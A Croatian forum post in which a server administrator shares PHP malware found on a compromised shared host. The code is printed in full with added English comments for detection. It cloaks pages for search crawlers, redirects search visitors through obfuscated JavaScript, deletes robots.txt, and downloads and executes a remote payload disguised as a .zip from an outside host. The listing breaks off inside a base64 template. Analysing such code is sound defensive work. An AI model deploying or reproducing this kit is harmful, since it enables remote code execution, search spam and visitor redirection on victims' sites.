Re: [PHP] Sumnjivi kod[Riješeno]
Postano: 08 stu 2016, 14:49
Dobro, provući ću kroz filter ubuduće, inače ti to bude zagurano sa strane da se ne vidi u nano-u.
taj gore kod je bio jedna linija
Fora je što taj .zip nije zip, nego ovo.
Sva sreća što imamo CloudLinux, inače bi sve sje.. , taj server ima 200 domena na sebi.
Malo je strašno kad pomisliš na to, ali izvukao sam neki stari backup iz 5. mjeseca i taj hack je tamo; ko zna koliko je to dugo unutra, samo ga je sad neko otkrio i aktivirao.
taj gore kod je bio jedna linija
Fora je sto taj .zip nije zip nego ovo
Sva sreća sto imamo cloud linux,inace bi sve sje.. ,taj server ima 200 domena na sebi,
malo je strašno kad pomisliš na to,ali izvukao sam neki stari backup iz 5. mjeseca i taj hack je tamo,ko zna koliko je to dugo unutra samo ga je sad neko otkrio i aktivirao
<?php
// NOTE(review): this listing is the injected code the forum poster found on a compromised host.
// Read as a whole it is a search-engine cloaking / redirect kit: it serves remotely supplied pages
// to crawlers and to visitors arriving from search results, and keeps a remotely updatable PHP
// payload in the document root. The comments below describe it for detection and clean-up.

// Silence all PHP errors and lift the execution time limit so the injected code leaves no
// warnings in page output.
error_reporting(0);
ini_set('display_errors', 0);
set_time_limit(0);
// Runs on every request: (re)creates xm1rpc.php, rewrites .htaccess and refreshes the cached
// redirect target and payload (see __create_initial_settings() further down).
__create_initial_settings();
// Case-insensitive patterns used to classify the request.
// "good" = crawler that gets freshly generated content; matched on User-Agent or reverse DNS.
$good_user_agents_to_filter = array( '#google#i' );
$reverse_ips_to_filter = array( '#google#i' );
// "bad" = other crawlers; they are only ever served an already cached page.
$bad_user_agents_to_filter = array( '#yahoo#i', '#msn#i', '#aol#i', '#bing#i' );
// Referer patterns that mark a human visitor arriving from a search result page.
$referers_to_filter = array('#google\.#i', '#yahoo\.#i', '#bing\.#i', '#msn\.#i', '#aol\.#i' );
// Request attributes; everything except REMOTE_ADDR is client-controlled.
$ip = isset($_SERVER['REMOTE_ADDR'])? $_SERVER['REMOTE_ADDR']: '';
$ua = isset($_SERVER['HTTP_USER_AGENT'])? $_SERVER['HTTP_USER_AGENT']: '';
$ref = isset($_SERVER['HTTP_REFERER'])? $_SERVER['HTTP_REFERER']: '';
$host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';
// First five hex characters of md5(host); not referenced again in the visible top-level code.
$host_hash = substr(md5($host), 0, 5);
$query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: '';
// Request path cut at the first '&' and then at the first '?'.
$request_uri = isset($_SERVER['REQUEST_URI'])? strtok(strtok($_SERVER['REQUEST_URI'],'&'),'?'): '';
// Document root as derived by __get_root() from SCRIPT_FILENAME / SCRIPT_NAME.
$root_path = __get_root();
// Deletes the site's real robots.txt on every request. A robots.txt that keeps disappearing from
// the document root is therefore an indicator of this infection.
if (file_exists($root_path.'/robots.txt'))
{
unlink($root_path.'/robots.txt');
}
// Requests for /robots.txt are answered with an allow-everything policy instead, so crawlers are
// never told to stay away from the injected pages.
if ($request_uri === '/robots.txt')
{
header('Content-Type:text/plain;charset=utf-8');
die("User-Agent: *\nAllow: /\n");
}
// Status probe: when the query string is exactly "checker-page" the script tries to reach the
// URL returned by __get_rev() and prints "Success!" or "Failed!". No authentication is checked
// here, so the probe answers anyone. Detection: access-log entries whose query string is
// "checker-page", and pages that answer with one of those two bare words.
if ($query === 'checker-page')
{
// __fetch_url() returns the response body or false; the "> 0" comparison is a loose
// success test on that value.
if (__fetch_url(__get_rev()) > 0)
{
die('Success!');
} else
{
die('Failed!');
}
}
// Code-execution entry point: any request whose query string contains "simpler-ws" makes PHP
// require() the file <docroot>/<md5('wsa')>.zip. require() executes the file as PHP whatever its
// extension, which is why the poster notes that "the .zip is not a zip". __get_ws() downloads
// that file from the URL built by __get_rev(), so whoever controls that server chooses what runs
// here. No authentication is checked in this branch.
// Detection: "simpler-ws" in access-log query strings; a 32-hex-character *.zip in the document
// root that is not a valid archive (e.g. begins with "<?php").
if (false !== strpos($query, 'simpler-ws'))
{
$ws_hash = md5('wsa');
$cache_dir = __get_root();
$ws_file = $cache_dir.'/'.$ws_hash.'.zip';
require($ws_file);
die('');
}
// --- Request classification -------------------------------------------------------------------
// "Good bot": the User-Agent matches one of the good patterns (here: contains "google").
$is_good_bot = false;
foreach ($good_user_agents_to_filter as $user_agent_to_filter)
{
if (preg_match($user_agent_to_filter, $ua))
{
$is_good_bot = true;
}
}
// "Bad bot": the User-Agent matches yahoo / msn / aol / bing.
$is_bad_bot = false;
foreach ($bad_user_agents_to_filter as $user_agent_to_filter)
{
if (preg_match($user_agent_to_filter, $ua))
{
$is_bad_bot = true;
}
}
// Second chance for "good bot": reverse-resolve the client address and match the host name.
// Only the reverse lookup is done; the name is not resolved forward again to confirm it.
// Side effect visible to defenders: one reverse DNS lookup per request that did not already
// match on User-Agent.
if (!$is_good_bot)
{
$reverse_ip = gethostbyaddr($ip);
foreach ($reverse_ips_to_filter as $reverse_ip_to_filter)
{
if (preg_match($reverse_ip_to_filter, $reverse_ip))
{
$is_good_bot = true;
}
}
}
// "Searcher": not a recognised crawler, but the Referer points at a search engine.
$is_searcher = false;
if (!$is_good_bot && !$is_bad_bot)
{
foreach ($referers_to_filter as $referer_to_filter)
{
if (preg_match($referer_to_filter, $ref))
{
$is_searcher = true;
}
}
}
// --- Cloaked response -------------------------------------------------------------------------
// Only crawlers and search-referred visitors enter this branch. Every other request falls through
// to whatever follows this code in the file, so someone opening the site directly, without a
// search-engine Referer, sees nothing unusual. To reproduce the behaviour during an
// investigation, compare responses fetched with and without a search-engine User-Agent/Referer.
if ($is_good_bot || $is_bad_bot || $is_searcher)
{
// Generated pages are cached in the system temp directory as SESS_<md5(host + uri + 'v1.0.2')>,
// raw-deflate compressed. The SESS_ prefix presumably imitates PHP session files -- confirm
// against the host's real session naming before relying on that.
$cache_dir = realpath(sys_get_temp_dir());
$cache_file = $cache_dir.'/SESS_'.md5(strtolower($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'v1.0.2'));
$template = false;
// Cache miss for a good bot or searcher: fetch the page text from the remote server and fill
// the HTML template with it. "Bad" bots never trigger a fetch; they only get cached pages.
if (($is_good_bot || $is_searcher) && !file_exists($cache_file))
{
$data = __get_text();
$template = '';
// 'macroses' maps placeholder => replacement text; all of it comes from the remote response.
if (isset($data['macroses']) && (count($data['macroses']) > 0))
{
$template = __get_template();
foreach ($data['macroses'] as $macros => $value)
{
$template = str_replace($macros, $value, $template);
}
}
if (!empty($template)) file_put_contents($cache_file, gzdeflate($template, 4));
} else if (file_exists($cache_file))
{
$template = gzinflate(file_get_contents($cache_file));
}
if ($template)
{
// The [JS] placeholder is filled on every response with the obfuscated redirect script.
$template = str_replace('[JS]', __get_js(), $template);
if (file_exists($cache_file))
{
// Conditional-GET handling based on the cache file's mtime and md5.
$last_modified_time = filemtime($cache_file);
$etag_file = md5_file($cache_file);
// Remaining lifetime counted as one year from the cache file's mtime.
$max_age = $last_modified_time + 60*60*24*365 - time();
// $expires is computed before $max_age is clamped to zero on the next line.
$expires = $last_modified_time + $max_age;
if ($max_age < 0) $max_age = 0;
header("Cache-Control: max-age=$max_age, public, must-revalidate");
header("Expires: ".gmdate("D, d M Y H:i:s", $expires)." GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s", $last_modified_time)." GMT");
header("Etag: $etag_file");
$if_modified_since = (isset($_SERVER['HTTP_IF_MODIFIED_SINCE'])? $_SERVER['HTTP_IF_MODIFIED_SINCE']: false);
$etag_header = (isset($_SERVER['HTTP_IF_NONE_MATCH'])? trim($_SERVER['HTTP_IF_NONE_MATCH']): false);
// && binds tighter than ||: (If-Modified-Since equals mtime) OR (If-None-Match equals the ETag).
if ($if_modified_since && (@strtotime($if_modified_since) === $last_modified_time) || ($etag_header === $etag_file) && $etag_file)
{
header("HTTP/1.1 304 Not Modified");
die();
}
} else
{
header("Cache-Control: max-age=0, public, must-revalidate");
}
// Send the injected page and stop, so the legitimate site content is never rendered.
header('Content-Type:text/html;charset=utf-8');
echo $template;
die();
}
}
/**
 * Wraps $code in a JavaScript snippet that rebuilds it character by character and passes the
 * result to document.write().
 *
 * The distinct characters of $code are collected, shuffled, base64-encoded and emitted as
 * `var _NN=atob('...')` with NN between 11 and 20; the text is then written as a chain of
 * `_NN[index]+` lookups into that string.
 *
 * Detection note: str_shuffle() and mt_rand() make the output differ on every call, so a fixed
 * string or hash of the served script will not match. The stable part is the shape: an atob()
 * dictionary assignment followed directly by document.write( of indexed lookups into it.
 *
 * @param string $code Text to hide (called from __get_js() with a complete <script> element).
 * @return string JavaScript source.
 */
function __obfuscate_write($code)
{
// Collect each distinct byte of $code once, in order of first appearance.
$uniques = '';
for ($i=0;$i<strlen($code);$i++)
{
if (strpos($uniques, $code[$i]) === false) $uniques .= $code[$i];
}
// Randomise the dictionary order so the indices differ on every call.
$uniques = str_shuffle($uniques);
$base = base64_encode($uniques);
$dictionary_name = '_'.mt_rand(11, 20);
$js = "var $dictionary_name=atob('$base');document.write(";
// Emit one dictionary lookup per character of the original text.
for ($i=0;$i<strlen($code);$i++)
{
$pos = strpos($uniques, $code[$i]);
$js .= $dictionary_name.'['.$pos.']+';
}
// Drop the trailing '+' left by the loop.
$js = trim($js, '+');
$js .= ");";
return $js;
}
/**
 * Same character-dictionary encoding as __obfuscate_write(), but the rebuilt string is assigned
 * to document.location, i.e. the browser is navigated to $code.
 *
 * The dictionary variable is named _NN with NN between 21 and 30. As in __obfuscate_write(), the
 * output changes on every call, so detection has to key on the structure (atob() dictionary
 * followed by `document.location = ` and indexed lookups), not on literal content.
 *
 * @param string $code Destination URL (called from __get_js() with the value of __get_tds()).
 * @return string JavaScript source.
 */
function __obfuscate_redirect($code)
{
// Collect each distinct byte of $code once.
$uniques = '';
for ($i=0;$i<strlen($code);$i++)
{
if (strpos($uniques, $code[$i]) === false) $uniques .= $code[$i];
}
$uniques = str_shuffle($uniques);
$base = base64_encode($uniques);
$dictionary_name = '_'.mt_rand(21, 30);
$js = "var $dictionary_name=atob('$base');document.location = ";
// One dictionary lookup per character of the URL.
for ($i=0;$i<strlen($code);$i++)
{
$pos = strpos($uniques, $code[$i]);
$js .= $dictionary_name.'['.$pos.']+';
}
$js = trim($js, '+');
$js .= ";";
return $js;
}
/**
 * Builds the script that replaces the [JS] placeholder in the served page.
 *
 * The inner script checks document.referrer in the browser for a search-engine name (google,
 * bing, yahoo, aol, ask, altavista, yandex) and, if one is found, navigates to the URL from
 * __get_tds(). The complete <script> element is then wrapped by __obfuscate_write(), so the
 * delivered page contains two layers: document.write() of a script that sets document.location.
 *
 * Effect for investigators: a visitor who opens the page without a search-engine referrer is not
 * redirected, which is why site owners often cannot reproduce the redirect by typing the URL.
 *
 * $_SERVER['HTTP_REFERER'], HTTP_HOST and REQUEST_URI are read without isset() checks here.
 *
 * @return string Obfuscated JavaScript source.
 */
function __get_js()
{
// Name of the variable holding document.referrer: _NN with NN between 31 and 40.
$var = '_'.mt_rand(31, 40);
$redirect = __obfuscate_redirect(__get_tds($_SERVER['HTTP_REFERER'], 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']));
$js = "<script type=\"text/javascript\">var $var=document.referrer;if(($var.indexOf('google.')!=-1)||($var.indexOf('bing.')!=-1)||($var.indexOf('yahoo.')!=-1)||($var.indexOf('aol.')!=-1)||($var.indexOf('ask.')!=-1)||($var.indexOf('altavista.')!=-1)||($var.indexOf('yandex.')!=-1)){ $redirect }</script>";
$js = __obfuscate_write($js);
return $js;
}
/**
 * Derives the document root by cutting SCRIPT_NAME off the end of SCRIPT_FILENAME.
 *
 * All files this kit drops (xm1rpc.php, the md5('wsa') .zip payload, .htaccess, the .rar
 * template) are addressed relative to this path. If SCRIPT_NAME does not occur in
 * SCRIPT_FILENAME, strpos() returns false and substr(..., 0, false) yields an empty string, so
 * those paths would then start at "/".
 *
 * @return string Path without trailing slash, or '' as described above.
 */
function __get_root()
{
$localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
return $root_path;
}
/**
 * Returns the base URL of the remote server every fetch in this file goes to, with the infected
 * site's host name and the current full URL attached as `host` and `full_url` parameters.
 *
 * Detection note: because of those parameters, each outbound request tells the remote side which
 * site and page were hit. The host named in the first return statement is the one to look for in
 * egress, proxy and DNS logs. The second return statement is unreachable; the host it names is
 * never contacted by this function.
 *
 * @return string
 */
function __get_rev()
{ return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
return 'http://nezlobudnya.com/generate';
}
/**
 * Returns the redirect destination for search-referred visitors.
 *
 * The base URL is requested from the remote server (__get_rev() . '&get_tds') and cached in the
 * system temp directory as SESS_<md5(host . 'tds')>; the cache is refreshed when it is missing or
 * older than three hours. The fetched value is written to the cache only if it passes
 * FILTER_VALIDATE_URL, but it is used for this call either way. The original Referer, the host
 * without "www." and the current URL are appended as query parameters.
 *
 * Notes on the literal string below:
 *  - '&se=$se' is inside single quotes, so the text "$se" is sent literally.
 *  - NOTE(review): the '¶meter=' fragment looks like '&parameter=' damaged when the listing was
 *    rendered as HTML ("&para" shown as the pilcrow sign) -- confirm against the file on disk.
 *
 * The second return statement is unreachable.
 *
 * Detection: SESS_<32 hex chars> files in the temp directory whose whole content is a URL.
 *
 * @param string $ref Referer of the current request.
 * @param string $url Full URL of the current request.
 * @return string
 */
function __get_tds($ref, $url)
{ $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';$host_hash = md5($host.'tds');$cache_dir = realpath(sys_get_temp_dir());$tds_file = $cache_dir.'/SESS_'.$host_hash;if (!file_exists($tds_file) || file_exists($tds_file) && (time() - filemtime($tds_file) > 60*60*3)){$tds = __fetch_url(__get_rev().'&get_tds');if (filter_var($tds, FILTER_VALIDATE_URL)) file_put_contents($tds_file, $tds);} else{$tds = file_get_contents($tds_file);}$tds .= '?seoref='.urlencode($ref).'¶meter='.urlencode(str_replace('www.', '', $host)).'&se=$se&ur=1&HTTP_REFERER='.urlencode($url);return $tds;
return 'http://cdn.nezlobudnya.com/directlink';
}
/**
 * Fetches the page content for the current URI from the remote server and returns it as a PHP
 * value.
 *
 * The request always carries fixed ip=127.0.0.1, rip=google and ua=googlebot parameters instead
 * of the real client's values. The caller expects an array with a 'macroses' key that maps
 * template placeholders to replacement text.
 *
 * NOTE(review): the response is passed to unserialize(). Data from a remote server is
 * deserialized with no class restriction, so the operator of that server -- or anyone able to
 * alter the plain-HTTP response in transit -- controls which objects are instantiated in this
 * process. Errors from gzinflate()/unserialize() are hidden with @.
 *
 * @return mixed Unserialized response; false when decoding fails.
 */
function __get_text()
{
// $host is assigned but not used in the rest of this function.
$host = isset($_SERVER['HTTP_HOST'])? urlencode($_SERVER['HTTP_HOST']): '';
$is_gzip = function_exists('gzinflate') ? 'true': '';
$full_uri = $_SERVER['REQUEST_URI'];
$text = __fetch_url(__get_rev().'&get_text&'."req=".urlencode($full_uri)."&gzip=".$is_gzip."&ip=127.0.0.1&rip=google&ua=googlebot&ref=");
if (function_exists('gzinflate'))
{
// Drops the first 10 and last 8 bytes before inflating -- consistent with stripping a gzip
// header and trailer from the response body.
$text = @gzinflate(substr($text,10,-8));
}
$text = @unserialize($text);
return $text;
}
/**
 * Downloads the remote payload and stores it as <docroot>/<md5('wsa')>.zip.
 *
 * The file is fetched again when it is missing or older than 24 hours; otherwise the cached copy
 * is read. This is the file that the "simpler-ws" branch at the top of the script executes with
 * require(), so its content is PHP despite the .zip extension, and it can change daily.
 *
 * Clean-up note: deleting the .zip alone does not help -- it is re-downloaded on the next request
 * as long as this code is still present in a served PHP file. Preserve a copy for analysis before
 * removing it.
 *
 * @return string|false Payload content, or false when the download failed.
 */
function __get_ws()
{
// $host is assigned but not used in the rest of this function.
$host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';
$ws_hash = md5('wsa');
$cache_dir = __get_root();
$ws_file = $cache_dir.'/'.$ws_hash.'.zip';
if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*24*1))
{
$ws = __fetch_url(__get_rev().'&get_ws');
// An empty or failed download leaves any existing file untouched.
if (!empty($ws)) file_put_contents($ws_file, $ws);
} else
{
$ws = file_get_contents($ws_file);
}
return $ws;
}
/**
 * Returns the HTML template that the fetched page text is merged into.
 *
 * A template file in the document root is tried first; its .rar extension is a disguise, since
 * the file is read as plain text. If that file is missing or does not contain the [CONTENT]
 * placeholder, a built-in template is decoded from the base64 literal below with __bdec(). The
 * literal starts with the encoding of "<!DOCTYPE html>" and appears to be a page in the style of
 * a stock WordPress theme with placeholders such as [TITLE], [CONTENT] and [JS].
 *
 * Detection: a 32-hex-character *.rar in the document root that is really HTML.
 *
 * @return string HTML template.
 */
function __get_template()
{
$root_path = __get_root();
$tpl_path = $root_path."/7f68d2eda2a56bd9a6a4af8c957ca273.rar";
// @ hides the warning raised when the file does not exist.
$tpl = @file_get_contents($tpl_path);
if (strpos($tpl, '[CONTENT]') === false)
{
// Fallback: embedded template, base64-encoded.
$tpl = __bdec('PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuLVVTIiBjbGFzcz0ianMiPjxoZWFkPgogIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5bSlNdPC9zY3JpcHQ+Cgk8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPgo8dGl0bGU+W1RJVExFXTwvdGl0bGU+CgoKCgkJPHNjcmlwdCBzcmM9Imh0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC93cC1pbmNsdWRlcy9qcy93cC1lbW9qaS1yZWxlYXNlLm1pbi5qcz92ZXI9NC41LVJDMS0zNzA3OSIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij48L3NjcmlwdD4KCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgppbWcud3Atc21pbGV5LAppbWcuZW1vamkgewoJZGlzcGxheTogaW5saW5lICFpbXBvcnRhbnQ7Cglib3JkZXI6IG5vbmUgIWltcG9ydGFudDsKCWJveC1zaGFkb3c6IG5vbmUgIWltcG9ydGFudDsKCWhlaWdodDogMWVtICFpbXBvcnRhbnQ7Cgl3aWR0aDogMWVtICFpbXBvcnRhbnQ7CgltYXJnaW46IDAgLjA3ZW0gIWltcG9ydGFudDsKCXZlcnRpY2FsLWFsaWduOiAtMC4xZW0gIWltcG9ydGFudDsKCWJhY2tncm91bmQ6IG5vbmUgIWltcG9ydGFudDsKCXBhZGRpbmc6IDAgIWltcG9ydGFudDsKfQo8L3N0eWxlPgo8bGluayByZWw9InN0eWxlc2hlZXQiIGlkPSJ0d2VudHlzaXh0ZWVuLWZvbnRzLWNzcyIgaHJlZj0iaHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU1lcnJpd2VhdGhlciUzQTQwMCUyQzcwMCUyQzkwMCUyQzQwMGl0YWxpYyUyQzcwMGl0YWxpYyUyQzkwMGl0YWxpYyU3Q01vbnRzZXJyYXQlM0E0MDAlMkM3MDAlN0NJbmNvbnNvbGF0YSUzQTQwMCZhbXA7c3Vic2V0PWxhdGluJTJDbGF0aW4tZXh0IiB0eXBlPSJ0ZXh0L2NzcyIgbWVkaWE9ImFsbCI+CjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaWQ9ImdlbmVyaWNvbnMtY3NzIiBocmVmPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9nZW5lcmljb25zL2dlbmVyaWNvbnMuY3NzP3Zlcj0zLjQuMSIgdHlwZT0idGV4dC9jc3MiIG1lZGlhPSJhbGwiPgo8bGluayByZWw9InN0eWxlc2hlZXQiIGlkPSJ0d2VudHlzaXh0ZWVuLXN0eWxlLWNzcyIgaHJlZj0iaHR0cHM6Ly93cC10aGVtZXMuY29tL3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eXNpeHRlZW4vc3R5bGUuY3NzP3Zlcj00LjUtUkMxLTM3MDc5IiB0eXBlPSJ0ZXh0L2NzcyIgbWVkaWE9ImFsbCI+CjwhLS1baWYgbHQgSUUgMTBdPgo8bGluayByZWw9J3N0eWxlc2hlZXQnIGlkPSd0d2VudHlzaXh0ZWVuLWllLWNzcycgIGhyZWY9J2h0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC1jb250ZW50L3RoZW1lcy90d2VudHlzaXh0ZWVuL2Nzcy9pZS5jc3M/dmVyPTIwMTUwOTMwJyB0eXBlPSd0ZXh0L2NzcycgbWVkaWE9J2FsbCcgLz4KPCFbZW5kaWZdLS0+CjwhLS1baWYgbHQgSUUgOV0+CjxsaW5rIHJlbD0nc3R5bGVzaGVldCcgaWQ9J3R3ZW50eXNpeHRlZ
W4taWU4LWNzcycgIGhyZWY9J2h0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC1jb250ZW50L3RoZW1lcy90d2VudHlzaXh0ZWVuL2Nzcy9pZTguY3NzP3Zlcj0yMDE1MTIzMCcgdHlwZT0ndGV4dC9jc3MnIG1lZGlhPSdhbGwnIC8+CjwhW2VuZGlmXS0tPgo8IS0tW2lmIGx0IElFIDhdPgo8bGluayByZWw9J3N0eWxlc2hlZXQnIGlkPSd0d2VudHlzaXh0ZWVuLWllNy1jc3MnICBocmVmPSdodHRwczovL3dwLXRoZW1lcy5jb20vd3AtY29udGVudC90aGVtZXMvdHdlbnR5c2l4dGVlbi9jc3MvaWU3LmNzcz92ZXI9MjAxNTA5MzAnIHR5cGU9J3RleHQvY3NzJyBtZWRpYT0nYWxsJyAvPgo8IVtlbmRpZl0tLT4KPCEtLVtpZiBsdCBJRSA5XT4KPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cHM6Ly93cC10aGVtZXMuY29tL3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eXNpeHRlZW4vanMvaHRtbDUuanM/dmVyPTMuNy4zJz48L3NjcmlwdD4KPCFbZW5kaWZdLS0+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHBzOi8vd3AtdGhlbWVzLmNvbS93cC93cC1pbmNsdWRlcy9qcy9qcXVlcnkvanF1ZXJ5LmpzP3Zlcj0xLjEyLjIiPjwvc2NyaXB0Pgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwczovL3dwLXRoZW1lcy5jb20vd3Avd3AtaW5jbHVkZXMvanMvanF1ZXJ5L2pxdWVyeS1taWdyYXRlLm1pbi5qcz92ZXI9MS40LjAiPjwvc2NyaXB0PgoKCiAKCjxtZXRhIG5hbWU9ImdlbmVyYXRvciIgY29udGVudD0iV29yZFByZXNzIDQuNS1SQzEtMzcwNzkiPgoKCgoKCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPi5yZWNlbnRjb21tZW50cyBhe2Rpc3BsYXk6aW5saW5lICFpbXBvcnRhbnQ7cGFkZGluZzowICFpbXBvcnRhbnQ7bWFyZ2luOjAgIWltcG9ydGFudDt9PC9zdHlsZT4KICA8bGluayByZWw9ImNhbm9uaWNhbCIgaHJlZj0iW1BBR0VfVVJMXSI+CiAgICA8bGluayByZWw9InByZXYiIGhyZWY9IltSQU5EX1VSTF9QUkVWXSI+CiAgICA8bGluayByZWw9Im5leHQiIGhyZWY9IltSQU5EX1VSTF9ORVhUXSI+CiAgICA8bWV0YSBwcm9wZXJ0eT0ib2c6dGl0bGUiIGNvbnRlbnQ9IltUSVRMRV0iPgogICAgPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiPgogICAgPG1ldGEgcHJvcGVydHk9Im9nOnNpdGVfbmFtZSIgY29udGVudD0iW0NPTU1PTl0iPgogICAgPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgY29udGVudD0iW1BBR0VfVVJMXSI+CiAgICA8bWV0YSBwcm9wZXJ0eT0ib2c6bG9jYWxlIiBjb250ZW50PSJlbl9VUyI+CiAgICA8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiBjb250ZW50PSJbREVTQ1JJUFRJT05dIj4KICAgIDxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJbS0VZV09SRFNdIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2Nhb
GU9MS4wLCB1c2VyLXNjYWxhYmxlPXllcyI+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CgkJPC9oZWFkPgoKPGJvZHkgY2xhc3M9InNpbmd1bGFyIHNpbmdsZSBzaW5nbGUtcG9zdCBwb3N0aWQtMTkgc2luZ2xlLWZvcm1hdC1zdGFuZGFyZCI+CjxkaXYgaWQ9InBhZ2UiIGNsYXNzPSJzaXRlIj4KCTxkaXYgY2xhc3M9InNpdGUtaW5uZXIiPgoJCTxhIGNsYXNzPSJza2lwLWxpbmsgc2NyZWVuLXJlYWRlci10ZXh0IiBocmVmPSIjY29udGVudCI+U2tpcCB0byBjb250ZW50PC9hPgoKCQk8aGVhZGVyIGlkPSJtYXN0aGVhZCIgY2xhc3M9InNpdGUtaGVhZGVyIiByb2xlPSJiYW5uZXIiPgoJCQk8ZGl2IGNsYXNzPSJzaXRlLWhlYWRlci1tYWluIj4KCQkJCTxkaXYgY2xhc3M9InNpdGUtYnJhbmRpbmciPgoJCQkJCQkJCQkJCTxwIGNsYXNzPSJzaXRlLXRpdGxlIj5bQ09NTU9OXTwvcD4KCQkJCQkJCQkJCQkKCQkJCQkJCQkJPC9kaXY+PCEtLSAuc2l0ZS1icmFuZGluZyAtLT4KCgkJCQkJCQk8L2Rpdj48IS0tIC5zaXRlLWhlYWRlci1tYWluIC0tPgoKCQkJCQk8L2hlYWRlcj48IS0tIC5zaXRlLWhlYWRlciAtLT4KCgkJPGRpdiBpZD0iY29udGVudCIgY2xhc3M9InNpdGUtY29udGVudCI+Cgo8ZGl2IGlkPSJwcmltYXJ5IiBjbGFzcz0iY29udGVudC1hcmVhIj4KCTxtYWluIGlkPSJtYWluIiBjbGFzcz0ic2l0ZS1tYWluIiByb2xlPSJtYWluIj4KCQkKPGFydGljbGUgaWQ9InBvc3QtMTkiIGNsYXNzPSJwb3N0LTE5IHBvc3QgdHlwZS1wb3N0IHN0YXR1cy1wdWJsaXNoIGZvcm1hdC1zdGFuZGFyZCBoZW50cnkgY2F0ZWdvcnktdW5jYXRlZ29yaXplZCB0YWctYm9hdCB0YWctbGFrZSI+Cgk8aGVhZGVyIGNsYXNzPSJlbnRyeS1oZWFkZXIiPgoJCTxoMSBjbGFzcz0iZW50cnktdGl0bGUiPltUSVRMRV08L2gxPgk8L2hlYWRlcj48IS0tIC5lbnRyeS1oZWFkZXIgLS0+CgoJCgkKCTxkaXYgY2xhc3M9ImVudHJ5LWNvbnRlbnQiPgogIFtDT05URU5UXQo8L2Rpdj48IS0tIC5lbnRyeS1jb250ZW50IC0tPgoKCQo8L2FydGljbGU+PCEtLSAjcG9zdC0jIyAtLT4KCgkKCTwvbWFpbj48IS0tIC5zaXRlLW1haW4gLS0+CgoJCjwvZGl2PjwhLS0gLmNvbnRlbnQtYXJlYSAtLT4KCgoJPGFzaWRlIGlkPSJzZWNvbmRhcnkiIGNsYXNzPSJzaWRlYmFyIHdpZGdldC1hcmVhIiByb2xlPSJjb21wbGVtZW50YXJ5Ij4KCQk8c2VjdGlvbiBpZD0ic2VhcmNoLTMiIGNsYXNzPSJ3aWRnZXQgd2lkZ2V0X3NlYXJjaCI+Cjxmb3JtIHJvbGU9InNlYXJjaCIgbWV0aG9kPSJnZXQiIGNsYXNzPSJzZWFyY2gtZm9ybSIgYWN0aW9uPSIjIj4KCTxsYWJlbD4KCQk8c3BhbiBjbGFzcz0ic2NyZWVuLXJlYWRlci10ZXh0Ij5TZWFyY2ggZm9yOjwvc3Bhbj4KCQk8aW5wdXQgdHlwZT0ic2VhcmNoIiBjbGFzcz0ic2VhcmNoLWZpZWxkIiBwbGFjZWhvbGRlcj0iU2VhcmNoIOKApiIgdmFsdWU9IiIgbmFtZ
